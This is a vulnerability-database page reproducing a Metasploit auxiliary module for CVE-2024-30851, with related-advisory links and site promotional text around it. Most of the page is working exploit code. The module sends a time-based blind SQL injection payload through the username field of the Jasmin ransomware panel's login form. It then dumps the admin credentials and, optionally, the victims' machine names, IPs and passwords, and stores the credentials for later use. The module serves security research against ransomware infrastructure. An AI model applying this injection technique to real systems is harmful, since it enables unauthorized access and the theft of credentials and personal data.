Vulners
Lucene search
Jasmin Ransomware Web Server Unauthenticated SQL Injection
🗓️ 31 Aug 2024 00:00:00Reported by h00die, chebuya, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 184 Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for CVE-2024-30851 | 4 Apr 202422:59 | – | githubexploit |
 | CVE-2024-30851 | 8 Apr 202415:48 | – | circl |
 | Jasmin The Ransomware 安全漏洞 | 3 May 202400:00 | – | cnnvd |
 | CVE-2024-30851 | 3 May 202400:00 | – | cve |
 | CVE-2024-30851 | 3 May 202400:00 | – | cvelist |
 | Jasmin Ransomware Web Server Unauthenticated Directory Traversal | 27 May 202419:54 | – | metasploit |
| Jasmin Ransomware Web Server Unauthenticated SQL Injection | 27 May 202419:54 | – | metasploit |
 | CVE-2024-30851 | 3 May 202417:15 | – | nvd |
 | CVE-2024-30851 | 3 May 202417:15 | – | osv |
| Jasmin Ransomware 1.1 Arbitrary File Read | 5 Apr 202400:00 | – | packetstorm |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Jasmin Ransomware Web Server Unauthenticated SQL Injection',
'Description' => %q{
The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
within the login functionality. As of April 15, 2024 this was still unpatched, so all
versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
Retrieving the victim's data may take a long amount of time. It is much quicker to
get the logins, then just login to the site.
},
'References' => [
['URL', 'https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc'],
['URL', 'https://github.com/codesiddhant/Jasmin-Ransomware']
],
'Author' => [
'chebuya', # discovery, PoC
'h00die', # metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2023-04-08',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Jasmin Ransomware webserver', '/']),
OptBool.new('VICTIMS', [false, 'Retrieve data on the victims', false]),
OptInt.new('VICTIMLIMIT', [false, 'Number of victims data to pull']),
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
return Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
Exploit::CheckCode::Safe("#{peer} - Jasmin login page not found")
end
def run
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
check_char = Rex::Text.rand_text_alpha_lower(5)
res = send_request_cgi({
'keep_cookies' => true,
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'checklogin.php'),
'vars_post' => {
'username' => "#{Rex::Text.rand_text_alpha_lower(1)}' AND (SELECT 1 FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha_lower(1)}) AND '#{check_char}'='#{check_char}",
'password' => '',
'service' => 'login'
}
})
fail_with(Failure::Unreachable, 'Connection failed') unless res
end
fail_with(Failure::NotVulnerable, "#{peer} - Testing of SQLi failed. If this is time based, try increasing SqliDelay.") unless @sqli.test_vulnerable
columns = ['admin', 'creds']
vprint_status('Dumping login table')
data = @sqli.dump_table_fields('master', columns, '')
table = Rex::Text::Table.new('Header' => 'Logins', 'Indent' => 1, 'Columns' => columns)
data.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :password,
private_data: user[1],
service_name: 'Jasmin Webpanel',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good('Dumped table contents:')
print_line(table.to_s)
return unless datastore['VICTIMS']
vprint_status('Dumping victim table')
columns = ['machine_name', 'computer_user', 'ip', 'systemid', 'password']
if datastore['VICTIMLIMIT'].nil?
data = @sqli.dump_table_fields('victims', columns, '')
else
data = @sqli.dump_table_fields('victims', columns, '', datastore['VICTIMLIMIT'])
end
table = Rex::Text::Table.new('Header' => 'Victims', 'Indent' => 1, 'Columns' => columns)
data.each do |victim|
table << victim
end
print_good('Dumped table contents:')
print_line(table.to_s)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
EPSS0.75688